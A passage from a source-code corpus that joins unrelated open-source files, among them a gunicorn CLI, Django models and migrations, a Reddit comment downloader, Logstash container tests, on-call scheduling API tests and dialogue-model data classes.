default="127.0.0.1:4190",
show_default=True,
help="A string of the form: HOST:PORT, unix:PATH, fd://FD.",
)
@click.option("--autoreload/--no-autoreload", default=False, show_default=True)
@click.option(
"--log-level",
type=click.Choice(["critical", "error", "warning", "info", "debug"]),
default="info",
show_default=True,
)
@click.option("--workers", "-w", default=cpu_count(), show_default=True)
@click.option(
"--worker-class",
"-k",
default="uvicorn.workers.UvicornWorker",
show_default=True,
)
@click.option("--daemon", "-d", default=False, is_flag=True, show_default=True)
@click.option(
"--configuration",
"-c",
type=click.Path(exists=True, file_okay=True, dir_okay=False, readable=True),
)
@click.argument("application")
def start(
workers: int,
worker_class: str,
daemon: bool,
configuration: str,
application: str,
bind: str,
autoreload: bool,
log_level: str,
):
command = (
f"{sys.executable} -m gunicorn -k {worker_class}"
+ f" --bind {bind}"
+ f" --chdir {os.getcwd()}"
+ f" --workers {workers}"
+ f" --pid {MASTER_PID_FILE}"
+ f" --log-level {log_level}"
)
args = command.split(" ")
if daemon:
args.extend("-D --log-file gunicorn.log".split(" "))
if autoreload:
args.append("--reload")
if configuration:
args.append("-c")
args.append(configuration.strip())
args.append(application)
execute(args)
# Gunicorn signal handler
# https://docs.gunicorn.org/en/stable/signals.html
@gunicorn_cli.command(help="Increment the number of processes by one")
def incr():
os.kill(read_gunicorn_master_pid(), signal.SIGTTIN)
@gunicorn_cli.command(help="Decrement the number of processes by one")
def decr():
os.kill(read_gunicorn_master_pid(), signal.SIGTTOU)
@gunicorn_cli.command(help="Stop gunicorn processes")
@click.option("--force", "-f", default=False, is_flag=True)
def stop(force):
os.kill(read_gunicorn_master_pid(), signal.SIGINT if force else signal.SIGTERM)
@gunicorn_cli.command(help="Reload configuration and recreate worker processes")
def reload():
os.kill(read_gunicorn_master_pid(), signal.SIGHUP)
@gunicorn_cli.command(help="Restart gunicorn master processes and worker processes")
@click.option("--force-stop", "-f", default=False, is_flag=True)
def restart(force_stop):
oldpid = read_gunicorn_master_pid()
os.kill(oldpid, signal.SIGUSR2)
# Waiting for starting new master process and worker processes
while not os.path.exists(os.path.join(os.getcwd(), MASTER_PID_FILE + ".2")):
time.sleep(0.5)
# Stop old master process and worker processes
os.kill(oldpid, signal.SIGINT if force_stop else signal.SIGTERM)
index_cli.add_command(gunicorn_cli, "gunicorn")
index_cli.add_command(display_urls, "display-urls")
import_module("commands")
|
unittest/scripts/auto/py_shell/scripts/util_help_norecord.py | mueller/mysql-shell | 119 | 47270 | #@ util help
util.help()
#@ util help, \? [USE:util help]
\? util
#@ util check_for_server_upgrade help
util.help('check_for_server_upgrade')
#@ util check_for_server_upgrade help, \? [USE:util check_for_server_upgrade help]
\? check_for_server_upgrade
# WL13807-TSFR_1_1
#@ util dump_instance help
util.help('dump_instance');
#@ util dump_instance help, \? [USE:util dump_instance help]
\? dump_instance
# WL13807-TSFR_2_1
#@ util dump_schemas help
util.help('dump_schemas');
#@ util dump_schemas help, \? [USE:util dump_schemas help]
\? dump_schemas
# WL13804-TSFR_6_1
#@ util dump_tables help
util.help('dump_tables');
#@ util dump_tables help, \? [USE:util dump_tables help]
\? dump_tables
# WL13804-TSFR_1_4
#@ util export_table help
util.help('export_table');
#@ util export_table help, \? [USE:util export_table help]
\? export_table
#@ util import_json help
util.help('import_json')
#@ util import_json help, \? [USE:util import_json help]
\? import_json
#@ util import_table help
util.help('import_table')
#@ util import_table help, \? [USE:util import_table help]
\? import_table
#@ util load_dump help
util.help('load_dump')
#@ util load_dump help, \? [USE:util load_dump help]
\? load_dump
|
cogdl/layers/gine_layer.py | li-ziang/cogdl | 1,072 | 47320 | import torch
import torch.nn.functional as F
from cogdl.utils import spmm
from . import BaseLayer
class GINELayer(BaseLayer):
r"""The modified GINConv operator from the `"Graph convolutions that can finally model local structure" paper
<https://arxiv.org/pdf/2011.15069.pdf>`__.
Parameters
----------
    apply_func : callable layer function
layer or function applied to update node feature
eps : float32, optional
Initial `\epsilon` value.
train_eps : bool, optional
If True, `\epsilon` will be a learnable parameter.
"""
def __init__(self, apply_func=None, eps=0, train_eps=True):
super(GINELayer, self).__init__()
if train_eps:
self.eps = torch.nn.Parameter(torch.FloatTensor([eps]))
else:
self.register_buffer("eps", torch.FloatTensor([eps]))
self.apply_func = apply_func
def forward(self, graph, x):
# m = self.message(x[graph.edge_index[0]], graph.edge_attr)
# out = self.aggregate(graph, m)
out = spmm(graph, x)
out += (1 + self.eps) * x
if self.apply_func is not None:
out = self.apply_func(out)
return out
def message(self, x, attr):
return F.relu(x + attr)
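# Illustrative sketch (an editorial addition, not part of the original cogdl source):
# forward() above computes out = spmm(graph, x) + (1 + eps) * x and then applies
# `apply_func` when one is given. The stand-in tensor `aggregated` below replaces
# spmm(graph, x); the sizes and the small MLP are assumptions made for illustration.
if __name__ == "__main__":
    num_nodes, dim = 4, 8                    # hypothetical sizes
    x_demo = torch.rand(num_nodes, dim)
    aggregated = torch.rand(num_nodes, dim)  # stands in for spmm(graph, x_demo)
    eps_demo = 0.1
    mlp = torch.nn.Sequential(torch.nn.Linear(dim, dim), torch.nn.ReLU())
    out_demo = mlp(aggregated + (1 + eps_demo) * x_demo)
    print(out_demo.shape)                    # torch.Size([4, 8])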
|
events/migrations/0010_auto_20180528_2033.py | Akash1S/meethub | 428 | 47332 | <reponame>Akash1S/meethub
# Generated by Django 2.0.4 on 2018-05-28 20:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('events', '0009_auto_20180428_0845'),
]
operations = [
migrations.RemoveField(
model_name='comment',
name='created_by',
),
migrations.RemoveField(
model_name='comment',
name='event',
),
migrations.DeleteModel(
name='Comment',
),
]
|
base/site-packages/mobileadmin/templatetags/mobile_admin_media.py | edisonlz/fastor | 285 | 47348 | <filename>base/site-packages/mobileadmin/templatetags/mobile_admin_media.py
from django.template import Library
register = Library()
def mobileadmin_media_prefix():
"""
Returns the string contained in the setting MOBILEADMIN_MEDIA_PREFIX.
"""
try:
from mobileadmin.conf import settings
except ImportError:
return ''
return settings.MEDIA_PREFIX
mobileadmin_media_prefix = register.simple_tag(mobileadmin_media_prefix)
|
src/algo/api_nfdomains.py | jumperavocado/staketaxcsv | 140 | 47358 | import logging
import requests
from settings_csv import ALGO_NFDOMAINS
# API documentation: https://editor.swagger.io/?url=https://api.testnet.nf.domains/info/openapi3.yaml
class NFDomainsAPI:
session = requests.Session()
def get_address(self, name):
endpoint = f"nfd/{name}"
params = {"view": "brief"}
data, status_code = self._query(ALGO_NFDOMAINS, endpoint, params)
if status_code == 200:
# https://docs.nf.domains/docs/faq#how-do-i-set-my-address-to-resolve-my-nfd
# If present, use the primary/deposit address, otherwise resolve to the owner address
if "caAlgo" in data:
return data["caAlgo"][0]
else:
return data["owner"]
else:
return None
def _query(self, base_url, endpoint, params=None):
logging.info("Querying NFDomains endpoint %s...", endpoint)
url = f"{base_url}/{endpoint}"
response = self.session.get(url, params=params)
return response.json(), response.status_code
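# Illustrative usage (an editorial addition, not part of the original module): resolve
# an NFD name to an Algorand address. "example.algo" is a made-up name used purely for
# demonstration, and a real lookup needs network access to the NFDomains API.
if __name__ == "__main__":
    api = NFDomainsAPI()
    address = api.get_address("example.algo")  # hypothetical NFD name
    print(address)  # None when the name does not resolve (non-200 response)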
|
tests/test_basics.py | viki-org/logstash-docker | 305 | 47400 | <filename>tests/test_basics.py
from .fixtures import logstash
from .constants import logstash_version_string
def test_logstash_is_the_correct_version(logstash):
assert logstash_version_string in logstash.stdout_of('logstash --version')
def test_the_default_user_is_logstash(logstash):
assert logstash.stdout_of('whoami') == 'logstash'
def test_that_the_user_home_directory_is_usr_share_logstash(logstash):
assert logstash.environment('HOME') == '/usr/share/logstash'
def test_locale_variables_are_set_correctly(logstash):
assert logstash.environment('LANG') == 'en_US.UTF-8'
assert logstash.environment('LC_ALL') == 'en_US.UTF-8'
def test_opt_logstash_is_a_symlink_to_usr_share_logstash(logstash):
assert logstash.stdout_of('realpath /opt/logstash') == '/usr/share/logstash'
def test_all_logstash_files_are_owned_by_logstash(logstash):
assert logstash.stdout_of('find /usr/share/logstash ! -user logstash') == ''
def test_logstash_user_is_uid_1000(logstash):
assert logstash.stdout_of('id -u logstash') == '1000'
def test_logstash_user_is_gid_1000(logstash):
assert logstash.stdout_of('id -g logstash') == '1000'
def test_logging_config_does_not_log_to_files(logstash):
assert logstash.stdout_of('grep RollingFile /logstash/config/log4j2.properties') == ''
# REF: https://docs.openshift.com/container-platform/3.5/creating_images/guidelines.html
def test_all_files_in_logstash_directory_are_gid_zero(logstash):
bad_files = logstash.stdout_of('find /usr/share/logstash ! -gid 0').split()
    assert len(bad_files) == 0
def test_all_directories_in_logstash_directory_are_setgid(logstash):
bad_dirs = logstash.stdout_of('find /usr/share/logstash -type d ! -perm /g+s').split()
    assert len(bad_dirs) == 0
|
rotkehlchen/tests/unit/uniswap/test_calculate_events_balances.py | rotkehlchenio/rotkehlchen | 137 | 47406 | <filename>rotkehlchen/tests/unit/uniswap/test_calculate_events_balances.py
from typing import List
import pytest
from rotkehlchen.chain.ethereum.interfaces.ammswap.types import LiquidityPool, LiquidityPoolEvent
from .utils import (
LP_1_EVENTS,
LP_1_EVENTS_BALANCE,
LP_2_EVENTS,
LP_2_EVENTS_BALANCE,
LP_3_BALANCE,
LP_3_EVENTS,
LP_3_EVENTS_BALANCE,
TEST_ADDRESS_1,
)
@pytest.mark.parametrize('ethereum_modules', [['uniswap']])
def test_no_events_no_balances(rotkehlchen_api_server):
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
events: List[LiquidityPoolEvent] = []
balances: List[LiquidityPool] = []
events_balances = rotki.chain_manager.get_module('uniswap')._calculate_events_balances(
address=TEST_ADDRESS_1,
events=events,
balances=balances,
)
assert events_balances == []
@pytest.mark.parametrize('ethereum_modules', [['uniswap']])
def test_single_pool_without_balances(rotkehlchen_api_server):
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
balances: List[LiquidityPool] = []
events_balances = rotki.chain_manager.get_module('uniswap')._calculate_events_balances(
address=TEST_ADDRESS_1,
events=LP_1_EVENTS,
balances=balances,
)
assert events_balances == [LP_1_EVENTS_BALANCE]
@pytest.mark.parametrize('ethereum_modules', [['uniswap']])
def test_multiple_pools_without_balances(rotkehlchen_api_server):
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
events = list(LP_1_EVENTS)
events.extend(LP_2_EVENTS)
balances: List[LiquidityPool] = []
events_balances = rotki.chain_manager.get_module('uniswap')._calculate_events_balances(
address=TEST_ADDRESS_1,
events=events,
balances=balances,
)
assert events_balances == [LP_1_EVENTS_BALANCE, LP_2_EVENTS_BALANCE]
@pytest.mark.parametrize('ethereum_modules', [['uniswap']])
def test_single_pool_with_balances(rotkehlchen_api_server):
"""Test LP current balances are factorized in the pool events balance
"""
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
events_balances = rotki.chain_manager.get_module('uniswap')._calculate_events_balances(
address=TEST_ADDRESS_1,
events=LP_3_EVENTS,
balances=[LP_3_BALANCE],
)
assert events_balances == [LP_3_EVENTS_BALANCE]
|
e2e/test_override.py | navoday-91/oncall | 857 | 47432 | # Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import requests
import time
from testutils import prefix,api_v0
start, end = int(time.time()), int(time.time() + 36000)
# truncate to a multiple of 1000; floor division keeps the timestamps as ints
start = start // 1000 * 1000
end = end // 1000 * 1000
# Helper function to send an override request
def override(start_time, end_time, ev_ids, user):
re = requests.post(api_v0('events/override'),
json={'start': start_time,
'end': end_time,
'event_ids': ev_ids,
'user': user})
assert re.status_code == 200
return re
# Test override when events need to be split
@prefix('test_v0_override_split')
def test_api_v0_override_split(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start + 100, end - 100, [ev_id], override_user)
data = re.json()
assert len(data) == 3
re = requests.get(api_v0('events?user=' + user_name))
events = sorted(re.json(), key=lambda x: x['start'])
assert len(events) == 2
assert events[0]['end'] == start + 100
assert events[1]['start'] == end - 100
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start + 100
assert events[0]['end'] == end - 100
# Test override when an event's start needs to be edited
@prefix('test_v0_override_edit_start')
def test_api_v0_override_edit_start(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start, end - 100, [ev_id], override_user)
data = re.json()
assert len(data) == 2
re = requests.get(api_v0('events?user=' + user_name))
events = re.json()
assert len(events) == 1
assert events[0]['end'] == end
assert events[0]['start'] == end - 100
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start
assert events[0]['end'] == end - 100
# Test override when an event's end needs to be edited
@prefix('test_api_v0_override_edit_end')
def test_api_v0_override_edit_end(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start + 100, end, [ev_id], override_user)
data = re.json()
assert len(data) == 2
re = requests.get(api_v0('events?user=' + user_name))
events = re.json()
assert len(events) == 1
assert events[0]['end'] == start + 100
assert events[0]['start'] == start
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start + 100
assert events[0]['end'] == end
# Test override when an event needs to be deleted
@prefix('test_api_v0_override_delete')
def test_api_v0_override_delete(team, user, role, event):
team_name = team.create()
user_name = user.create()
override_user = user.create()
role_name = role.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev_id = event.create({'start': start,
'end': end,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start - 10, end + 10, [ev_id], override_user)
assert len(re.json()) == 1
re = requests.get(api_v0('events?user=' + user_name))
events = re.json()
assert len(events) == 0
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start
assert events[0]['end'] == end
# Test combination of above cases
@prefix('test_api_v0_override_multiple')
def test_api_v0_override_multiple(team, user, role, event):
team_name = team.create()
role_name = role.create()
user_name = user.create()
override_user = user.create()
user.add_to_team(user_name, team_name)
user.add_to_team(override_user, team_name)
ev1 = event.create({'start': start-1000,
'end': start+1000,
'user': user_name,
'team': team_name,
'role': role_name})
ev2 = event.create({'start': start+1000,
'end': start+2000,
'user': user_name,
'team': team_name,
'role': role_name})
ev3 = event.create({'start': start+2000,
'end': end-1000,
'user': user_name,
'team': team_name,
'role': role_name})
ev4 = event.create({'start': end-1000,
'end': end+1000,
'user': user_name,
'team': team_name,
'role': role_name})
re = override(start, end, [ev1, ev2, ev3, ev4], override_user)
assert len(re.json()) == 3
re = requests.get(api_v0('events?user=' + user_name))
events = sorted(re.json(), key=lambda x: x['start'])
assert len(events) == 2
assert events[0]['start'] == start - 1000
assert events[0]['end'] == start
assert events[1]['start'] == end
assert events[1]['end'] == end + 1000
re = requests.get(api_v0('events?user=' + override_user))
events = re.json()
assert events[0]['start'] == start
assert events[0]['end'] == end
|
openbook_notifications/models/post_reaction_notification.py | TamaraAbells/okuna-api | 164 | 47443 | from django.contrib.contenttypes.fields import GenericRelation
from django.db import models
from openbook_notifications.models.notification import Notification
from openbook_posts.models import PostReaction
class PostReactionNotification(models.Model):
notification = GenericRelation(Notification, related_name='post_reaction_notifications')
post_reaction = models.ForeignKey(PostReaction, on_delete=models.CASCADE)
@classmethod
def create_post_reaction_notification(cls, post_reaction_id, owner_id):
post_reaction_notification = cls.objects.create(post_reaction_id=post_reaction_id)
Notification.create_notification(type=Notification.POST_REACTION,
content_object=post_reaction_notification,
owner_id=owner_id)
return post_reaction_notification
@classmethod
def delete_post_reaction_notification(cls, post_reaction_id, owner_id):
cls.objects.filter(post_reaction_id=post_reaction_id,
notification__owner_id=owner_id).delete()
@classmethod
def delete_post_reaction_notifications(cls, post_reaction_id):
cls.objects.filter(post_reaction_id=post_reaction_id).delete()
|
scripts/subreddit_comments_alt.py | awesome-archive/subreddit-analyzer | 497 | 47456 | <filename>scripts/subreddit_comments_alt.py
"""
This script uses the Pushshift API to download comments from the specified subreddits.
By default it downloads all the comments from the newest one to the first one of the specified date.
"""
import csv
import sys
import time
from datetime import datetime
import requests
# 10,000 should cover at least 3 years of comments.
sys.setrecursionlimit(10000)
SUBREDDITS = ["mexico"]
HEADERS = {"User-Agent": "Comments Downloader v0.2"}
COMMENTS_LIST = list()
# Year month and day.
TARGET_DATE = "2019-01-01"
TARGET_TIMESTAMP = datetime.fromisoformat(TARGET_DATE).timestamp()
def init():
"""Iterates over all the subreddits and creates their csv files."""
for subreddit in SUBREDDITS:
writer = csv.writer(open("./{}-comments.csv".format(subreddit),
"w", newline="", encoding="utf-8"))
# Adding the header.
writer.writerow(["datetime", "author", "body"])
print("Downloading:", subreddit)
load_comments(subreddit, writer)
def load_comments(subreddit, writer, latest_timestamp=None):
"""Keeps downloading comments using recursion, it saves them 500 at a time.
Parameters
----------
subreddit : str
The desired subreddit.
write: csv.writer
A writer object that will save the comments to disk.
latest_timestamp: int
The timestampf of the latest comment.
"""
base_url = "https://api.pushshift.io/reddit/comment/search/"
params = {"subreddit": subreddit, "sort": "desc",
"sort_type": "created_utc", "size": 500}
stop_loading = False
# After the first call of this function we will use the 'before' parameter.
if latest_timestamp != None:
params["before"] = latest_timestamp
with requests.get(base_url, params=params, headers=HEADERS) as response:
json_data = response.json()
total_comments = len(json_data["data"])
latest_timestamp = 0
print("Downloading: {} comments".format(total_comments))
for item in json_data["data"]:
# We will only take 3 properties, the timestamp, author and body.
latest_timestamp = item["created_utc"]
iso_date = datetime.fromtimestamp(latest_timestamp)
if latest_timestamp <= TARGET_TIMESTAMP:
stop_loading = True
break
COMMENTS_LIST.append(
[iso_date, item["author"], item["body"]])
writer.writerows(COMMENTS_LIST)
COMMENTS_LIST.clear()
if total_comments < 500:
print("No more r○esults.")
elif stop_loading:
print("Download complete.")
else:
time.sleep(1.2)
load_comments(subreddit, writer, latest_timestamp)
if __name__ == "__main__":
init()
|
ch02-安装OpenCV/最简单-使用pip安装opencv-python和opencv-contrib-python/test_video.py | makelove/OpenCV-Python-Tutorial | 2,875 | 47463 | # -*- coding: utf-8 -*-
# @Time : 2017/8/2 10:46
# @Author : play4fun
# @File : test_video.py
# @Software: PyCharm
"""
test_video.py:
"""
import numpy as np
import cv2
from matplotlib import pyplot as plt
cap = cv2.VideoCapture('../../data/vtest.avi')  # does not support reading the video
# cap = cv2.VideoCapture('output.avi')
# cap = cv2.VideoCapture('Minions_banana.mp4')
# frame rate
fps = cap.get(cv2.CAP_PROP_FPS) # 25.0
print("Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}".format(fps))
# total number of frames
num_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
print('total of', num_frames, 'frames')
#
frame_height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
frame_width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
print('height:', frame_height, 'width:', frame_width)
FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES) # frame 0
print('current frame number', FRAME_NOW) # current frame number 0.0
# read a specified frame; only works for video files, has no effect for cameras??
# frame_no = 121
# cap.set(1, frame_no) # Where frame_no is the frame you want
ret, frame = cap.read() # Read the frame
print(ret, frame)
# cv2.imshow('frame_no'+str(frame_no), frame)
FRAME_NOW = cap.get(cv2.CAP_PROP_POS_FRAMES)
print('current frame number', FRAME_NOW) # current frame number 122.0
if frame is not None:  # error occurs otherwise
plt.imshow(frame)
# plt.imshow(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
plt.show() |
contrib/stack/alosStack/estimate_swath_offset.py | yuankailiu/isce2 | 1,133 | 47489 | #!/usr/bin/env python3
#
# Author: <NAME>
# Copyright 2015-present, NASA-JPL/Caltech
#
import os
import glob
import datetime
import numpy as np
import isce, isceobj
from isceobj.Alos2Proc.runSwathOffset import swathOffset
from StackPulic import loadTrack
from StackPulic import acquisitionModesAlos2
def cmdLineParse():
'''
command line parser.
'''
import sys
import argparse
parser = argparse.ArgumentParser(description='estimate swath offset')
parser.add_argument('-idir', dest='idir', type=str, required=True,
help = 'data directory')
parser.add_argument('-date', dest='date', type=str, required=True,
help = 'data acquisition date. format: YYMMDD')
parser.add_argument('-output', dest='output', type=str, required=True,
help = 'output file')
#parser.add_argument('-match', dest='match', type=int, default=1,
# help = 'do matching when computing adjacent swath offset. 0: no. 1: yes (default)')
parser.add_argument('-match', dest='match', action='store_true', default=False,
help='do matching when computing adjacent swath offset')
if len(sys.argv) <= 1:
print('')
parser.print_help()
sys.exit(1)
else:
return parser.parse_args()
if __name__ == '__main__':
inps = cmdLineParse()
#get user parameters from input
idir = inps.idir
date = inps.date
outputFile = inps.output
match = inps.match
#######################################################
spotlightModes, stripmapModes, scansarNominalModes, scansarWideModes, scansarModes = acquisitionModesAlos2()
frames = sorted([x[-4:] for x in glob.glob(os.path.join(idir, 'f*_*'))])
track = loadTrack(idir, date)
#save current dir
dirOriginal = os.getcwd()
os.chdir(idir)
if (track.operationMode in scansarModes) and (len(track.frames[0].swaths) >= 2):
for i, frameNumber in enumerate(frames):
frameDir = 'f{}_{}'.format(i+1, frameNumber)
os.chdir(frameDir)
mosaicDir = 'mosaic'
os.makedirs(mosaicDir, exist_ok=True)
os.chdir(mosaicDir)
#compute swath offset
offsetReference = swathOffset(track.frames[i], date+'.slc', outputFile,
crossCorrelation=match, numberOfAzimuthLooks=10)
os.chdir('../../')
else:
print('there is only one swath, no need to estimate swath offset')
|
tests/functions/test_get_referencing_foreign_keys.py | tteaka/sqlalchemy-utils | 879 | 47495 | <gh_stars>100-1000
import pytest
import sqlalchemy as sa
from sqlalchemy_utils import get_referencing_foreign_keys
class TestGetReferencingFksWithCompositeKeys(object):
@pytest.fixture
def User(self, Base):
class User(Base):
__tablename__ = 'user'
first_name = sa.Column(sa.Unicode(255), primary_key=True)
last_name = sa.Column(sa.Unicode(255), primary_key=True)
return User
@pytest.fixture
def Article(self, Base, User):
class Article(Base):
__tablename__ = 'article'
id = sa.Column(sa.Integer, primary_key=True)
author_first_name = sa.Column(sa.Unicode(255))
author_last_name = sa.Column(sa.Unicode(255))
__table_args__ = (
sa.ForeignKeyConstraint(
[author_first_name, author_last_name],
[User.first_name, User.last_name]
),
)
return Article
@pytest.fixture
def init_models(self, User, Article):
pass
def test_with_declarative_class(self, User, Article):
fks = get_referencing_foreign_keys(User)
assert Article.__table__.foreign_keys == fks
def test_with_table(self, User, Article):
fks = get_referencing_foreign_keys(User.__table__)
assert Article.__table__.foreign_keys == fks
class TestGetReferencingFksWithInheritance(object):
@pytest.fixture
def User(self, Base):
class User(Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, primary_key=True)
type = sa.Column(sa.Unicode)
first_name = sa.Column(sa.Unicode(255))
last_name = sa.Column(sa.Unicode(255))
__mapper_args__ = {
'polymorphic_on': 'type'
}
return User
@pytest.fixture
def Admin(self, User):
class Admin(User):
__tablename__ = 'admin'
id = sa.Column(
sa.Integer, sa.ForeignKey(User.id), primary_key=True
)
return Admin
@pytest.fixture
def TextItem(self, Base, User):
class TextItem(Base):
__tablename__ = 'textitem'
id = sa.Column(sa.Integer, primary_key=True)
type = sa.Column(sa.Unicode)
author_id = sa.Column(sa.Integer, sa.ForeignKey(User.id))
__mapper_args__ = {
'polymorphic_on': 'type'
}
return TextItem
@pytest.fixture
def Article(self, TextItem):
class Article(TextItem):
__tablename__ = 'article'
id = sa.Column(
sa.Integer, sa.ForeignKey(TextItem.id), primary_key=True
)
__mapper_args__ = {
'polymorphic_identity': 'article'
}
return Article
@pytest.fixture
def init_models(self, User, Admin, TextItem, Article):
pass
def test_with_declarative_class(self, Admin, TextItem):
fks = get_referencing_foreign_keys(Admin)
assert TextItem.__table__.foreign_keys == fks
def test_with_table(self, Admin):
fks = get_referencing_foreign_keys(Admin.__table__)
assert fks == set([])
|
mars/serialization/arrow.py | hxri/mars | 2,413 | 47498 | <reponame>hxri/mars
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union, List, Dict, Any
from .core import Serializer, buffered
try:
import pyarrow as pa
pa_types = Union[pa.Table, pa.RecordBatch]
except ImportError: # pragma: no cover
pa = None
pa_types = Any
class ArrowBatchSerializer(Serializer):
serializer_name = 'arrow'
@buffered
def serialize(self, obj: pa_types, context: Dict):
header = {}
sink = pa.BufferOutputStream()
writer = pa.RecordBatchStreamWriter(sink, obj.schema)
if isinstance(obj, pa.Table):
header['type'] = 'Table'
writer.write_table(obj)
else:
header['type'] = 'Batch'
writer.write_batch(obj)
writer.close()
buf = sink.getvalue()
buffers = [buf]
return header, buffers
def deserialize(self, header: Dict, buffers: List, context: Dict):
reader = pa.RecordBatchStreamReader(pa.BufferReader(buffers[0]))
if header['type'] == 'Table':
return reader.read_all()
else:
return reader.read_next_batch()
if pa is not None: # pragma: no branch
ArrowBatchSerializer.register(pa.Table)
ArrowBatchSerializer.register(pa.RecordBatch)
|
python/ql/test/3/library-tests/modules/general/main.py | vadi2/codeql | 4,036 | 47504 | import package
import helper
import package.assistant
#We expect that 'a' below will be 1 not a module.
from confused_elements import a
import sys |
deeppavlov/models/go_bot/dto/dataset_features.py | xbodx/DeepPavlov | 5,893 | 47508 | <filename>deeppavlov/models/go_bot/dto/dataset_features.py<gh_stars>1000+
from typing import List
import numpy as np
# todo remove boilerplate duplications
# todo comments
# todo logging
# todo naming
from deeppavlov.models.go_bot.nlu.dto.nlu_response import NLUResponse
from deeppavlov.models.go_bot.policy.dto.digitized_policy_features import DigitizedPolicyFeatures
from deeppavlov.models.go_bot.tracker.dto.dst_knowledge import DSTKnowledge
from copy import deepcopy
class UtteranceFeatures:
"""
the DTO-like class storing the training features of a single utterance of a dialog
(to feed the GO-bot policy model)
"""
action_mask: np.ndarray
attn_key: np.ndarray
tokens_embeddings_padded: np.ndarray
features: np.ndarray
def __init__(self,
nlu_response: NLUResponse,
tracker_knowledge: DSTKnowledge,
features: DigitizedPolicyFeatures):
self.action_mask = features.action_mask
self.attn_key = features.attn_key
tokens_vectorized = nlu_response.tokens_vectorized # todo proper oop
self.tokens_embeddings_padded = tokens_vectorized.tokens_embeddings_padded
self.features = features.concat_feats
class UtteranceTarget:
"""
the DTO-like class storing the training target of a single utterance of a dialog
(to feed the GO-bot policy model)
"""
action_id: int
def __init__(self, action_id):
self.action_id = action_id
class UtteranceDataEntry:
"""
the DTO-like class storing both the training features and target
of a single utterance of a dialog (to feed the GO-bot policy model)
"""
features: UtteranceFeatures
target: UtteranceTarget
def __init__(self, features, target):
self.features = features
self.target = target
@staticmethod
def from_features_and_target(features: UtteranceFeatures, target: UtteranceTarget):
return UtteranceDataEntry(deepcopy(features), deepcopy(target))
@staticmethod
def from_features(features: UtteranceFeatures):
return UtteranceDataEntry(deepcopy(features), UtteranceTarget(None))
class DialogueFeatures:
"""
the DTO-like class storing both the training features
of a dialog (to feed the GO-bot policy model)
"""
action_masks: List[np.ndarray]
attn_keys: List[np.ndarray]
tokens_embeddings_paddeds: List[np.ndarray]
featuress: List[np.ndarray]
def __init__(self):
self.action_masks = []
self.attn_keys = []
self.tokens_embeddings_paddeds = []
self.featuress = []
def append(self, utterance_features: UtteranceFeatures):
self.action_masks.append(utterance_features.action_mask)
self.attn_keys.append(utterance_features.attn_key)
self.tokens_embeddings_paddeds.append(utterance_features.tokens_embeddings_padded)
self.featuress.append(utterance_features.features)
def __len__(self):
return len(self.featuress)
class DialogueTargets:
"""
the DTO-like class storing both the training targets
of a dialog (to feed the GO-bot policy model)
"""
action_ids: List[int]
def __init__(self):
self.action_ids = []
def append(self, utterance_target: UtteranceTarget):
self.action_ids.append(utterance_target.action_id)
def __len__(self):
return len(self.action_ids)
class DialogueDataEntry:
"""
the DTO-like class storing both the training features and targets
of a dialog (to feed the GO-bot policy model)
"""
features: DialogueFeatures
targets: DialogueTargets
def __init__(self):
self.features = DialogueFeatures()
self.targets = DialogueTargets()
def append(self, utterance_features: UtteranceDataEntry):
self.features.append(utterance_features.features)
self.targets.append(utterance_features.target)
def __len__(self):
return len(self.features)
class PaddedDialogueFeatures(DialogueFeatures):
"""
the DTO-like class storing both the **padded to some specified length** training features
of a dialog (to feed the GO-bot policy model)
"""
padded_dialogue_length_mask: List[int]
def __init__(self, dialogue_features: DialogueFeatures, sequence_length):
super().__init__()
padding_length = sequence_length - len(dialogue_features)
self.padded_dialogue_length_mask = [1] * len(dialogue_features) + [0] * padding_length
self.action_masks = dialogue_features.action_masks + \
[np.zeros_like(dialogue_features.action_masks[0])] * padding_length
self.attn_keys = dialogue_features.attn_keys + [np.zeros_like(dialogue_features.attn_keys[0])] * padding_length
self.tokens_embeddings_paddeds = dialogue_features.tokens_embeddings_paddeds + \
[np.zeros_like(
dialogue_features.tokens_embeddings_paddeds[0])] * padding_length
self.featuress = dialogue_features.featuress + [np.zeros_like(dialogue_features.featuress[0])] * padding_length
class PaddedDialogueTargets(DialogueTargets):
"""
